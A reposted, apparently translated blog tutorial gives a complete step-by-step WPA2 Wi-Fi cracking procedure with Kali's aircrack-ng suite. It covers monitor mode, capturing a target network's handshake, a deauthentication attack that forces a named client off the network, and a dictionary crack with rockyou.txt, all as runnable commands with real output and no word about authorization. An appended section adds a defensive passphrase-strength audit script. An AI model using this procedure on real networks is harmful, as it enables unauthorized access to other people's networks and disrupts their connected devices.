Cracking Wi-Fi with Kali

1. Check the wireless interface name: iwconfig

There is one wireless card, named wlan0.

root@jkali:~# iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:"jlysltqx"  
          Mode:Managed  Frequency:2.462 GHz  Access Point: 28:6C:07:0A:CE:7D   
          Bit Rate=144.4 Mb/s   Tx-Power=22 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on
          Link Quality=63/70  Signal level=-47 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:11   Missed beacon:0

2. Use the following commands to stop the processes that would interfere

root@jkali:~# service network-manager stop 
root@jkali:~# airmon-ng check kill

Killing these processes:

  PID Name
 6246 wpa_supplicant

3. Enable monitor mode

root@jkali:~# airmon-ng start wlan0


PHY    Interface    Driver        Chipset

phy0    wlan0        iwlwifi        Intel Corporation Wireless 8265 / 8275 (rev 78)

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

4. Check that the interface has entered monitor mode

root@jkali:~# iwconfig
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=0 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
lo        no wireless extensions.

5. Capture packets

root@jkali:~# airodump-ng wlan0mon

 CH  4 ][ Elapsed: 12 s ][ 2019-01-30 20:46                                         
                                                                                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                             
 0C:4B:54:0A:0A:B5   -1        0        2    0   6  -1   WPA              <length:  0>                                                                       
 28:6C:07:0A:CE:7D  -43       16        0    0  11  130  WPA2 CCMP   PSK  jlysltqx                                                                           
 0C:6A:BC:56:AB:ED  -52       14        1    0  13  130  WPA2 CCMP   PSK  ChinaNet-fG5b                                                                      
 88:86:03:C6:69:0C  -58       18        0    0   7  130  WPA2 CCMP   PSK  ChinaNet-sWTz                                                                      
 E0:28:61:7F:33:14  -73        6        0    0   9  130  WPA2 CCMP   PSK  ChinaNet-SrPw                                                                      
 50:1D:93:3B:70:E8  -75       16        0    0   8  130  WPA2 CCMP   PSK  CMCC-er99                                                                          
 8E:25:93:C9:53:EB  -75       11        0    0   2  405  WPA2 CCMP   PSK  Guest_53EB                                                                         
 88:25:93:C9:53:EB  -75       12        0    0   2  405  WPA2 CCMP   PSK  Master                                                                             
 BC:D1:77:BD:F1:14  -77        9        0    0   1  270  WPA2 CCMP   PSK  ¬����2      

We will capture jlysltqx: its BSSID is 28:6C:07:0A:CE:7D, its channel (CH) is 11, and its encryption is WPA2.

6. Capture only the packets of the Wi-Fi network we want

root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa
 CH 11 ][ Elapsed: 30 s ][ 2019-01-30 20:53                                         
                                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                             
 28:6C:07:0A:CE:7D  -44   0      288    11125 2262  11  130  WPA2 CCMP   PSK  jlysltqx                                                                       
                                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                   
                                                                                                                                                             
 28:6C:07:0A:CE:7D  3C:B6:B7:E0:4C:05  -28    0e- 0e  1353    11134                                                                                           
 28:6C:07:0A:CE:7D  68:3E:34:2A:77:6A  -58    0 -24      0        2 

7. Step 6 did not capture the handshake, so we disconnect one of the devices and let it reconnect in order to capture the handshake

aireplay-ng -0 2 -a 28:6C:07:0A:CE:7D -c 3C:B6:B7:E0:4C:05 wlan0mon

8. Run step 6 again to capture the handshake

root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa
 CH 11 ][ Elapsed: 1 min ][ 2019-01-30 21:03 ][ WPA handshake: 28:6C:07:0A:CE:7D                                         
                                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                             
 28:6C:07:0A:CE:7D  -42   2      633     4166    4  11  130  WPA2 CCMP   PSK  jlysltqx                                                                       
                                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                   
                                                                                                                                                             
 28:6C:07:0A:CE:7D  3C:B6:B7:E0:4C:05  -29    0e- 0e  6804     4296  jlysltqx                                                                                 
 28:6C:07:0A:CE:7D  68:3E:34:2A:77:6A  -59    0 -24      0        5  

9. Check the captured files; wpa-04.cap is the capture that succeeded

root@jkali:~/kk# ls -lrt
总用量 14172
-rw-r--r-- 1 root root     1755 1月  30 20:50 wpa-01.kismet.netxml
-rw-r--r-- 1 root root      591 1月  30 20:50 wpa-01.kismet.csv
-rw-r--r-- 1 root root      387 1月  30 20:50 wpa-01.csv
-rw-r--r-- 1 root root     9580 1月  30 20:50 wpa-01.cap
-rw-r--r-- 1 root root     3887 1月  30 20:52 wpa-02.kismet.netxml
-rw-r--r-- 1 root root      592 1月  30 20:52 wpa-02.kismet.csv
-rw-r--r-- 1 root root      579 1月  30 20:52 wpa-02.csv
-rw-r--r-- 1 root root    47836 1月  30 20:52 wpa-02.cap
-rw-r--r-- 1 root root     3902 1月  30 20:53 wpa-03.kismet.netxml
-rw-r--r-- 1 root root      600 1月  30 20:53 wpa-03.kismet.csv
-rw-r--r-- 1 root root      579 1月  30 20:53 wpa-03.csv
-rw-r--r-- 1 root root 10212388 1月  30 20:53 wpa-03.cap
-rw-r--r-- 1 root root     4144 1月  30 21:03 wpa-04.kismet.netxml
-rw-r--r-- 1 root root      598 1月  30 21:03 wpa-04.kismet.csv
-rw-r--r-- 1 root root      587 1月  30 21:03 wpa-04.csv
-rw-r--r-- 1 root root  4178189 1月  30 21:03 wpa-04.cap

10. Use a dictionary to crack it (if the dictionary file has not been decompressed, decompress it yourself)

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-04.cap

11. After cracking is finished, restore the network

root@jkali:~# service network-manager start
root@jkali:~# airmon-ng stop wlan0mon

PHY    Interface    Driver        Chipset

phy0    wlan0mon        iwlwifi        Intel Corporation Wireless 8265 / 8275 (rev 78)

        (mac80211 station mode vif enabled on [phy0]wlan0)
        (mac80211 monitor mode vif disabled for [phy0]wlan0mon)
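Added example (not part of the original post): step 10 only succeeds when the network's passphrase is in the wordlist, because the WPA2-PSK master key is derived deterministically from the passphrase and the ESSID. The sketch below shows that derivation and audits a passphrase you own against a wordlist; the function names and the sample wordlist are constructed for illustration.

```python
import hashlib
import time

def wpa2_pmk(passphrase: str, essid: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, ESSID as salt,
    4096 iterations, 32-byte output (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), 4096, 32)

def audit_passphrase(passphrase: str, wordlist) -> list:
    """Return the reasons a passphrase would fall to a dictionary attack."""
    findings = []
    if not 8 <= len(passphrase) <= 63:
        findings.append("length outside the 8-63 characters WPA2-PSK allows")
    if passphrase.isdigit():
        findings.append("digits only: small keyspace (phone numbers, dates)")
    # Wordlists such as rockyou.txt are matched line by line, exactly.
    if any(line.rstrip("\r\n") == passphrase for line in wordlist):
        findings.append("present in the wordlist")
    return findings

def guesses_per_second(samples: int = 20) -> float:
    """Measure how many PMK derivations this CPU performs per second."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"candidate{i:04d}", "jlysltqx")
    return samples / (time.perf_counter() - start)

# Constructed sample wordlist; in practice pass an open file instead, e.g.
# open("/usr/share/wordlists/rockyou.txt", errors="ignore").
SAMPLE_WORDLIST = ["123456789\n", "password\n", "iloveyou1\n"]

if __name__ == "__main__":
    # Constructed candidate passphrases for the audit.
    for candidate in ("password", "20190130", "tulip-Kettle-91-moss"):
        result = audit_passphrase(candidate, SAMPLE_WORDLIST)
        print(candidate, "->", result or "no finding")
    print(f"~{guesses_per_second():.0f} PMK derivations/s on this CPU")
```

A passphrase with no findings here is only known to be absent from this one list; length and randomness are what keep it out of larger ones.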

Reposted from www.cnblogs.com/jason-dong/p/10339853.html